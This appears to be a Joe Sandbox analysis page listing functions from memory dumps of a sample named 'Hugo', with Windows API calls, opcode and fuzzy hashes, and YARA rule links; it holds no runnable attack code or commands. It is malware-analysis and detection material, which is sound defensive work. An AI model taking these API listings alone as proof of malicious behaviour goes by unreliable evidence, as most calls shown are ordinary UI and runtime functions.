Opcode ID: 905e5d7272eb68d9bc4d888c8c78b89dc726b8d0234bc9b38e252ee0f064803e
Instruction ID: 7323a53083d2746dfd0a58c6fbe0fb895decff9904a33d949d4d23dcb89ad826
Opcode Fuzzy Hash: 905e5d7272eb68d9bc4d888c8c78b89dc726b8d0234bc9b38e252ee0f064803e
Instruction Fuzzy Hash: 8E11297A200341ABCB146F38DC48E7A77A9FF457A0B10802BF906C7250EF71D802E752

Function 00FA60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00FA615A
_wcslen.LIBCMT ref: 00FA616C
_wcslen.LIBCMT ref: 00FA6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA62B5

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 8efc94b77b49ea8eeb75dfc2ba07d408ad319c5b76d4073a01154dbfd6c28ef1
Instruction ID: 4b9874749b8d42d5737a832ccd17e4376e18d145fb9620435e4ddc939a7aebb2
Opcode Fuzzy Hash: 8efc94b77b49ea8eeb75dfc2ba07d408ad319c5b76d4073a01154dbfd6c28ef1
Instruction Fuzzy Hash: AD11B4B6A002089ADF20DF659C84AEE7BACEF17770F14402AF911D5181EB74DA41EA60

Function 00F42079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76bb3c9bf065445efd54d0e6e243be690a683328fb065d0766fcf1278aec4f30
Instruction ID: f73a821e06add4b9646beab198f19e9b8392c21f13d6c8c51d35585bb7c3ab28
Opcode Fuzzy Hash: 76bb3c9bf065445efd54d0e6e243be690a683328fb065d0766fcf1278aec4f30
Instruction Fuzzy Hash: 9701A2B2A0921A7EF661267C6CC0F277B9DDF413B8B740336BD21A11D1EE648C40B160

Function 00F72374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00F72394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F723A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F723BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F723D7

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8e1b7f05bfe908b7c6240de4c8f059b0c3edb29ea3653b8ce5c89b48f1d2d00
Instruction ID: f0b262f9b90274b6e7cda214ac281d45174545d730c673afb4f8c49032dd371d
Opcode Fuzzy Hash: d8e1b7f05bfe908b7c6240de4c8f059b0c3edb29ea3653b8ce5c89b48f1d2d00
Instruction Fuzzy Hash: 7811097AD00218FFEB119BA5CD85F9DBB78FB08750F204096EA05B7290D6716E50EB94

Function 00F11AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F11AF4
GetClientRect.USER32(?,?), ref: 00F531F9
GetCursorPos.USER32(?), ref: 00F53203
ScreenToClient.USER32(?,?), ref: 00F5320E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 6449dcdb4e5a9692d4a0641d6a8c0cccdb7c5e68d58878bfe49ec97d493575b0
Instruction ID: 71891ee8edd71ec1e68690cc4a18fe590d2532de0675d4fe06cc33f4051f8f9c
Opcode Fuzzy Hash: 6449dcdb4e5a9692d4a0641d6a8c0cccdb7c5e68d58878bfe49ec97d493575b0
Instruction Fuzzy Hash: 23113A72A01119ABCB00EFA8CD859EE7BB8FF05351F100452EA02E2141D778BA91FBA1

Function 00F7EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F7EB14
MessageBoxW.USER32(?,?,?,?), ref: 00F7EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F7EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F7EB64

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b1d884398cc6af54f014d8efbd793071b12e2c44c0d2cd942bcd4d629cbf1e00
Instruction ID: 74974046007622efd2d26a425600e73c0e56a8324ee69d38eac8f31da028e765
Opcode Fuzzy Hash: b1d884398cc6af54f014d8efbd793071b12e2c44c0d2cd942bcd4d629cbf1e00
Instruction Fuzzy Hash: 6B112BB290025CBFDB019FAC9C45A9F7FADEB4A320F048257F816D72A0D674C904AB61

Function 00F3D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00F3D369,00000000,00000004,00000000), ref: 00F3D588
GetLastError.KERNEL32 ref: 00F3D594
__dosmaperr.LIBCMT ref: 00F3D59B
ResumeThread.KERNEL32(00000000), ref: 00F3D5B9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: a1734ce5d9e4bec5d28477c4059bf5dcbdc0311b2c109b36770d8cdc18b1b83f
Instruction ID: d84e7e3d35b5ce4d5168edd7c8b9afbb72955dab95403738d0b49533823409d0
Opcode Fuzzy Hash: a1734ce5d9e4bec5d28477c4059bf5dcbdc0311b2c109b36770d8cdc18b1b83f
Instruction Fuzzy Hash: 3601F572805218BBDB116FA5FC05BAA7B69EF82335F140229F926861E0DB708804F6A1

Function 00F17873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F178B1
GetStockObject.GDI32(00000011), ref: 00F178C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F178CF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 046e6e9af82f03e07d0fe0366f302765336da1c122d0a07339d30ea7abe2ccc9
Instruction ID: 0d3e9e979b8c34c1cf3452ad0a6d586c52309076916400ada08457a697672ef0
Opcode Fuzzy Hash: 046e6e9af82f03e07d0fe0366f302765336da1c122d0a07339d30ea7abe2ccc9
Instruction Fuzzy Hash: 79115BB2905649BFEF166F90DC58EEABB69FF09364F140115FA1952120DB319CA0FBA0

Function 00F433E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00F4338D,00000364,00000000,00000000,00000000,?,00F435FE,00000006,FlsSetValue), ref: 00F43418
GetLastError.KERNEL32(?,00F4338D,00000364,00000000,00000000,00000000,?,00F435FE,00000006,FlsSetValue,00FB3260,FlsSetValue,00000000,00000364,?,00F431B9), ref: 00F43424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F4338D,00000364,00000000,00000000,00000000,?,00F435FE,00000006,FlsSetValue,00FB3260,FlsSetValue,00000000), ref: 00F43432

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: dc94ebbf0a10bb95c626596b0b0bcc7c4f782992739f49e52b43dd7d3f83129e
Instruction ID: e4d43210b1232e76077fa5bb8e7aeb5e282081b0faccf925fa600889844ce594
Opcode Fuzzy Hash: dc94ebbf0a10bb95c626596b0b0bcc7c4f782992739f49e52b43dd7d3f83129e
Instruction Fuzzy Hash: 9601A773B11226ABDB22CB799C44AD67FA8BF16B717210620FE06D7590D730DE41E6E0

Function 00F7BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BAED

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d0c144dfe07bc6131d5d320b8a2c66ec844852145633572cfe390ba91ed8a174
Instruction ID: 03ffd6576390a42a3231376bf693ff5d6da942c19a81144ed03d1dba768e542b
Opcode Fuzzy Hash: d0c144dfe07bc6131d5d320b8a2c66ec844852145633572cfe390ba91ed8a174
Instruction Fuzzy Hash: 8B118E71C0152DDBEF00EFE4E9497EEBB78BF0A711F108096D945B2180CB348651EB62

Function 00FA886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00FA888E
ScreenToClient.USER32(?,?), ref: 00FA88A6
ScreenToClient.USER32(?,?), ref: 00FA88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FA88E5

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 8b495493eb65bf48a756706fb06e7425261489fe4b6b5c94ce210541585aaea8
Instruction ID: ca5dd5054e048796448d6d687d69e5e615b650d16342e21996086c04490c9db3
Opcode Fuzzy Hash: 8b495493eb65bf48a756706fb06e7425261489fe4b6b5c94ce210541585aaea8
Instruction Fuzzy Hash: DA1160B9D0020DAFDB01CFA8C884AEEBBB9FF09310F108066E915E2610D735AA51DF50

Function 00F736F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F73712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73723
GetCurrentThreadId.KERNEL32 ref: 00F7372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F73731

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 6caf1fb2b03d87bb66465cf59224a27fcdfada30af9b0920eba09a80cf05ac72
Instruction ID: 5825216e2a6df1afbc5c1604baf616b957022665f9a46a5ae7b3fdafd6d10a90
Opcode Fuzzy Hash: 6caf1fb2b03d87bb66465cf59224a27fcdfada30af9b0920eba09a80cf05ac72
Instruction Fuzzy Hash: F6E06DF25052287ADA241BA29C4DEEB7F6CDB43BA1F00001AF10AD2480DAA08941F6B2

Function 00FA92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00F11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F11F87
Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11F96
Part of subcall function 00F11F2D: BeginPath.GDI32(?), ref: 00F11FAD
Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FA92E3
LineTo.GDI32(?,?,?), ref: 00FA92F0
EndPath.GDI32(?), ref: 00FA9300
StrokePath.GDI32(?), ref: 00FA930E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7da1ad8b07924a241e832034430857adc246c9c5adfa28a14f5752832559798f
Instruction ID: 05ff022fb730b50467f20986545fe04caed96b2f1674a11350965d1dea726deb
Opcode Fuzzy Hash: 7da1ad8b07924a241e832034430857adc246c9c5adfa28a14f5752832559798f
Instruction Fuzzy Hash: B1F0FE7100525DBADB125F54AC0EFCE3F69AF0B320F148100FA16650E2C7B59562BBA5

Function 00F121A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F121BC
SetTextColor.GDI32(?,?), ref: 00F121C6
SetBkMode.GDI32(?,00000001), ref: 00F121D9
GetStockObject.GDI32(00000005), ref: 00F121E1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 65a71789bfc332ec87c37d443d4f4d8ad672c107161d2ca30a645e16fe96f0ad
Instruction ID: 51e320644591537ff16551e08c5cbf458d7fb87504ec4c27baca351cce6e80d8
Opcode Fuzzy Hash: 65a71789bfc332ec87c37d443d4f4d8ad672c107161d2ca30a645e16fe96f0ad
Instruction Fuzzy Hash: 5CE06571640244AEDB215B74AC09BE87B11AB13336F148219F7B6540E0C7714645BB10

Function 00F6EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00F6EC36
GetDC.USER32(00000000), ref: 00F6EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6EC60
ReleaseDC.USER32(?), ref: 00F6EC81

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 6829d7e0cad44c1461ef042b1b816e6ad633ddb334528f980a2bb30d33b8d235
Instruction ID: 88f598bddf334bf6896e5671c47f1e2aa9b65a333b22726ebc5946c87a0aff9a
Opcode Fuzzy Hash: 6829d7e0cad44c1461ef042b1b816e6ad633ddb334528f980a2bb30d33b8d235
Instruction Fuzzy Hash: 57E01AB5C00208DFCB40AFA0D908A9DBBB1EB48310F108409E84BE3750C7385942FF00

Function 00F6EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00F6EC4A
GetDC.USER32(00000000), ref: 00F6EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6EC60
ReleaseDC.USER32(?), ref: 00F6EC81

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 90f1024c5aa28994b8b30a26ab92a40ff4e4d9ea02f6f1b97968d92c795655cf
Instruction ID: 1d046e8759ecc0882dc2b22eea929d01fb06ce9e2544632fac3bf09052ae2138
Opcode Fuzzy Hash: 90f1024c5aa28994b8b30a26ab92a40ff4e4d9ea02f6f1b97968d92c795655cf
Instruction Fuzzy Hash: 53E012B5C00208EFCB40AFA0D908A9DBBB1AB48310B108409E84AE3750CB386A02AF00

Function 00F857CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F85919

Strings

LPT, xrefs: 00F85840
*, xrefs: 00F85855

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 4bcf2cf8af4c5b6a2fe4fafaac9a25f4461b6ae7412112b09da70421b0e8bf54
Instruction ID: db0ffc3a5ac5752e82c64ce0a47731c9ba3d4de9e15e7ae265962cf5354884b4
Opcode Fuzzy Hash: 4bcf2cf8af4c5b6a2fe4fafaac9a25f4461b6ae7412112b09da70421b0e8bf54
Instruction Fuzzy Hash: 8C916B75A006049FCB14EF54C8D4EEABBF1AF44714F188099E84A9F362C775EE85EB90

Function 00F3E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00F3E67D

Strings

pow, xrefs: 00F3E655, 00F3E672

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: f76400be5148e9cb24054da7d1d4ed25a908f5a3e5903d06ad8f94e62811fb5c
Instruction ID: e8c045e10aa6558a5ef3cab45b944209666309cdb3a55466b2704344388f8fd7
Opcode Fuzzy Hash: f76400be5148e9cb24054da7d1d4ed25a908f5a3e5903d06ad8f94e62811fb5c
Instruction Fuzzy Hash: 99517F61E2810686D7157714CD4237E3FA4AF907B0F304D5AF892422E8EF358D97BE46

Function 00F2A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00F2A916

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

